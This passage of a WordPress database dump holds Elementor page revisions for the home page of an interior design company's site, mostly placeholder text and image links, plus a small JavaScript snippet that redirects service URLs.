role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:54:42','2023-05-25 10:54:42','',22,'https://bauhaus.futuremediatrix.com/?p=4781',0,'revision','',0),(4782,2,'2023-05-25 10:54:42','2023-05-25 10:54:42','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:54:42','2023-05-25 10:54:42','',22,'https://bauhaus.futuremediatrix.com/?p=4782',0,'revision','',0),(4783,2,'2023-05-25 11:20:55','2023-05-25 11:20:55','const path = location.pathname.split(\'/\');\r\n\r\nif (path[1] === \"service\"){\r\nwindow.location.href = `/${path[2]}`	\r\n}','Move Service / Hide Service','','publish','closed','closed','','move-service','','','2023-05-25 11:32:09','2023-05-25 11:32:09','',0,'https://bauhaus.futuremediatrix.com/wpcode/move-service/',0,'wpcode','',0),(4784,2,'2023-05-25 11:27:13','2023-05-25 11:27:13','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget 